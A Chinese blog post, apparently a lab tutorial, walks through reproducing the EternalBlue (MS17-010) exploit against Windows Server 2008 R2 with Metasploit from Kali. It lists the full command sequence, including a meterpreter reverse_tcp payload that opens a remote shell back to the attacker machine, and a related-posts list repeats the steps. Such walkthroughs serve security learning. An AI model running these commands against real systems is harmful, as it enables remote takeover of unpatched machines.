针对windows server 2008R2 复现永恒之蓝漏洞(命令行操作)

最新推荐文章于 2024-04-11 17:29:47 发布
最新推荐文章于 2024-04-11 17:29:47 发布
阅读量2.4k 收藏 8
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50505929/article/details/115358985
版权

kali渗透windows server 2008 R2 永恒之蓝

linux:kali Linux

windows:windows server 2008 R2

确认进入kali的root

进入kali的msf:msfconsole
在这里插入图片描述
使用可用端口模块:use auxiliary/scanner/smb/smb_version
在这里插入图片描述

查看需要设置的参数:show options
在这里插入图片描述
yes为需要设置的参数,no无需设置
设置目标主机地址:set rhosts 192.168.205.150
在这里插入图片描述

设置线程数:set threads 20
在这里插入图片描述
攻击:run
查看目标主机开放的端口号:show options
在这里插入图片描述
利用永恒之蓝漏洞:use exploit/windows/smb/ms17_010_eternalblue
设置一个Payload,使攻击机接受来自目标主机的session:set payload windows/meterpreter/reverse_tcp
设置目标主机地址:set rhosts 192.168.205.150
设置接受payload的地址,我们这里设置MSF的地址:set lhost 192.168.205.148
设置接受的端口,这个自己自定义,只要不与其它端口冲突就可以:set LPORT 5555
执行攻击命令:Exploit
在这里插入图片描述
在这里插入图片描述
meterpreter >攻入成功

普及小知识

“永恒之蓝”

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

K_to
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记一次windows 2008 R2 SP1中永恒之蓝病毒的处理过程
shanda_liang的博客
12-25 8820
问题描述:win2008 R2服务器发现不停重启,蓝屏,蓝屏界面如下图。各种百度,不知问题何解。 PAGE_FAULT_IN_NONPAGED_AREA (50) 解决步骤:利用windbg工具分析dump文件。巴拉巴拉一通,用windbg分析出了有用的东西,看如下截图。 初步分析是程序mssecsvc.exe导致驱动异常,ntkrnlmp.exe挂掉,导致蓝屏。这mssecsvc....
方程式工具-永恒之蓝 Windows 2008 r2 安装补丁
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之蓝)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之蓝)[原理扫描] 【3】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0145)(方程式工具-永恒之蓝)[原理扫描] 【4】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0146)(方程式工具-永恒之蓝)[原理扫描] 【5】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0148)(方程式工具-永恒之蓝)[原理扫描] windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
永恒之蓝(ms17-010)复现对win7与win server2008 R2渗透
Lzcsfg的博客
04-10 1443
在虚拟机中安装关闭win7与win2008的防火墙,并正常有ip地址。本文对两种windows进行攻击测试,可以选用安装一个windows即可原理:永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的网络攻击工具,它利用了Windows操作系统中的一个漏洞,该漏洞被标记为MS17-010。这个漏洞影响了微软的SMB协议(Server Message Block),该协议通常用于在本地网络中共享文件、打印机和其他资源。
永恒之蓝漏洞复现
最新发布
weixin_60250620的博客
04-11 541
漏洞介绍永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。存在漏洞的主机,只需要开放445端口即可被攻击,获取系统最高权限影响版本。
windows 2008 CVE-2017-0148 方程式工具-永恒之蓝 修复
陈洋的博客
04-26 3988
windows 2008 CVE-2017-0148 方程式工具-永恒之蓝 修复 windows 2008R2 445端口 - 注册表禁用SMB服务 禁用SMBv1 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Valu...
永恒之蓝漏洞复现Windows server 2008系列缓冲区溢出漏洞
weixin_44970417的博客
07-25 2497
漏洞信息 漏洞名称:Windows server 2008系列缓冲区溢出漏洞 CVEID:2017-0144 漏洞类型:输入验证错误 威胁类型:远程 发布时间:2017-03-14 危害等级:高危 漏洞简介:Microsoft服务器消息块1.0(SMBv1)服务器处理某些请求的方式中存在一个远程执行代码漏洞Windows Server 2008 SP2和R2 SP1以及Windows server 2016允许远程攻击者通过精心制作的数据包(也称为“Windows SMB远程代码执行漏洞”)在目标服务器上
Sql2008R2的一个补丁BUG-大家使用时请注意
weixin_33774615的博客
05-12 327
http://www.cnblogs.com/shanksgao/p/3929555.html
SQL Server 2008 r2数据库可疑状态解决
Peter_paker的博客
07-01 2955
SQL server 2008 r2 数据库可疑状态恢复方法
win2012R2永恒之蓝安全补丁.zip
05-12
KB4012213是针对Windows 8.1和Windows Server 2012 R2的一个安全更新,修复了永恒之蓝利用的SMBv1漏洞。这个补丁不仅堵住了漏洞,还增强了系统的安全性,降低了被恶意软件感染的风险。安装KB4012213后,系统可以防止...
windowsserver2008r2无限网卡驱动.rar
12-07
Windows Server 2008 R2操作系统中,无线网络适配器的驱动程序是确保无线连接正常工作的重要组成部分。该压缩包文件“windowsserver2008r2无线网卡驱动.rar”包含了适用于该操作系统版本的无线网卡驱动程序,旨在...
windowsserver2008r2有线网卡驱动.rar
12-07
在IT领域,Windows Server 2008 R2是一款由微软公司推出的服务器操作系统,它基于Windows 7开发,提供了一套强大的服务器管理工具和服务。在这款操作系统中,网络连接是核心功能之一,尤其是有线网卡驱动,对于系统...
WindowsServer2008R2中文语言包 ISO 网盘下载地址
01-21
WindowsServer2008R2中文语言包 ISO 网盘下载地址 7601.17514.101119-1850_x64fre_server_langpacks_1-GRMSXLP1_DVD.iso
sql server 2008威胁和漏洞矩阵
cuanji3287的博客
11-25 499
尽管 SQL Server 包含各种安全机制,但是每个系统中都存在可被恶意利用的功能。每项暴露数据或其他信息的功能,如果实施错误,就可视为风险。 尽管每项功能可能表示存在一个风险,但是所有风险并不等同。有些风险需要更改操作,有...
SQL Server 远程代码执行漏洞复现(cve-2020-0618)
weixin_45006525的博客
04-26 2229
SQL Server 远程代码执行漏洞复现(cve-2020-0618) 简介 SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。 漏洞概述 低权限的攻击者向影响版本SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码,即可实现getshell。 影响版本 SQL Server 2012 for 32-bit Systems Service Pack 4
Windows Server 2012 R2 Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
友人A的博客
06-17 1278
一、漏洞情况 二、整改记录
windows server 2012 R2 解决漏洞(CVE-2018-0886)--避了很多坑
CR
11-04 8690
系统: windows server 2012 R2 standard 扫描出漏洞: Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)【原理扫描】 按照微软官方给的答案 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886,对应下载安装包是 KB4103725 或 KB4103715 但是下载后安装 报错: 此更新不适用此计算机。 按照百度教程中 :
windows server 2012主机漏洞-复现-修复
热门推荐
weixin_42881032的博客
09-16 1万+
windows server 2012 目录windows server 2012Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)复现Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010) Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CV
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之蓝漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,复现永恒之蓝漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值